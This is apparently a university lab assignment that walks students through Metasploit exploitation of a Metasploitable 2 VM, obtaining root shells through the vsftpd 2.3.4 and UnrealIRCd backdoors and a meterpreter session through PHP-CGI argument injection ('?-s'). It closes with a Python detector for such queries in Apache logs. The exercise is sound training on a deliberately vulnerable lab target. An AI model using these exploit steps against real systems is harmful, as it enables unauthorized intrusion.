Start your Metasploitable 2 VM and log in as msfadmin with the password msfadmin.
Execute the ifconfig command on both machines and ping from one to the other. Make sure you get replies, as shown below.
In Kali, execute this command to open Metasploit.
msfconsole
At the "msf>" prompt, execute this command.
search vsftpd
As shown below, one exploit is found.
Execute these commands:
use exploit/unix/ftp/vsftpd_234_backdoor
show options
As shown below, the only required parameter is RHOST, the IP address of the target system.
Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.
set RHOST 172.16.1.190
exploit
As shown below, a command shell session opens. Execute the whoami command to see the reply root.
Capture a whole-desktop image and save it as "Proj 6a".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
In Kali, execute these commands to exit the shell and Metasploit.
exit
exit
In Kali, execute this command to open Metasploit.
msfconsole
At the "msf>" prompt, execute this command.
search unreal
As shown below, one exploit is found.
Execute these commands:
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
As shown below, the only required parameter is RHOST, the IP address of the target system.
Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.
set RHOST 172.16.1.190
exploit
As shown below, a command shell session opens. Execute the whoami command to see the reply root.
Capture a whole-desktop image and save it as "Proj 6b".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
Press Ctrl+C to cancel the session.
In Kali, execute these commands to exit the shell and Metasploit.
y
exit
A Web page opens, as shown below.
Click the phpMyAdmin link.
Append this to the end of the URL, and press Enter.
?-s
The source code of the Web page appears, as shown below.
This is a known bug in PHP-CGI, and it allows us to get remote code execution with Metasploit.
In Kali, execute this command to open Metasploit.
msfconsole
At the "msf>" prompt, execute this command.
search php_cgi
As shown below, one exploit is found.
Execute these commands:
use exploit/multi/http/php_cgi_arg_injection
show options
As shown below, the only required parameter is RHOST, the IP address of the target system.
Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.
set RHOST 172.16.1.190
exploit
As shown below, a meterpreter session opens.
Troubleshooting
If you are using Kali 2017.2, this exploit fails, and you get the message "Meterpreter session closed ... reason: died", as shown below. This seems to be a bug in Kali. Just turn in that image and I'll accept it.
Execute these commands to see system information and your user ID. You are "www-data", which is a low-privilege account. To get root access, you need another exploit, as discussed here.
sysinfo
getuid
Capture a whole-desktop image and save it as "Proj 6c".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
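From the defender's side, the "?-s" request used above leaves a recognizable trace in the web server's access log: a query string with no "=" that begins with a dash. The following is an added example, not part of the original project; it assumes Apache common/combined log format, the function names are hypothetical, and the log entries are constructed.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined log entry: client ... "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})')

def is_cgi_switch_query(target):
    """True when the query string would reach a CGI binary as a command-line switch."""
    _path, sep, query = target.partition("?")
    if not sep or not query:
        return False
    # A literal "=" makes the query ordinary form data, not program arguments.
    if "=" in query:
        return False
    # Decode before testing so a percent-encoded dash is not missed (defensive choice).
    return unquote_plus(query).lstrip().startswith("-")

def find_suspicious(lines):
    """Return (client, target, status) for every request that matches."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and is_cgi_switch_query(m.group(3)):
            hits.append((m.group(1), m.group(3), int(m.group(4))))
    return hits

# Constructed sample entries (not captured from a real server).
SAMPLE_LOG = [
    '172.16.1.188 - - [12/Oct/2017:21:00:01 -0400] "GET /phpMyAdmin/ HTTP/1.1" 200 4145',
    '172.16.1.188 - - [12/Oct/2017:21:00:09 -0400] "GET /phpMyAdmin/?-s HTTP/1.1" 200 30211',
    '172.16.1.188 - - [12/Oct/2017:21:00:15 -0400] "GET /phpMyAdmin/index.php?db=test&token=-s HTTP/1.1" 200 5120',
    '172.16.1.188 - - [12/Oct/2017:21:00:21 -0400] "POST /phpMyAdmin/?%2ds HTTP/1.1" 200 30211',
    '172.16.1.188 - - [12/Oct/2017:21:00:30 -0400] "GET /search?-=1 HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for client, target, status in find_suspicious(SAMPLE_LOG):
        print(f"{client} requested {target} (status {status})")
```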
Send a Cc to yourself.
Hacking Unreal IRCd 3.2.8.1 on Metasploitable 2
https://community.rapid7.com/docs/DOC-1875
Last Modified: 10-12-17 9 pm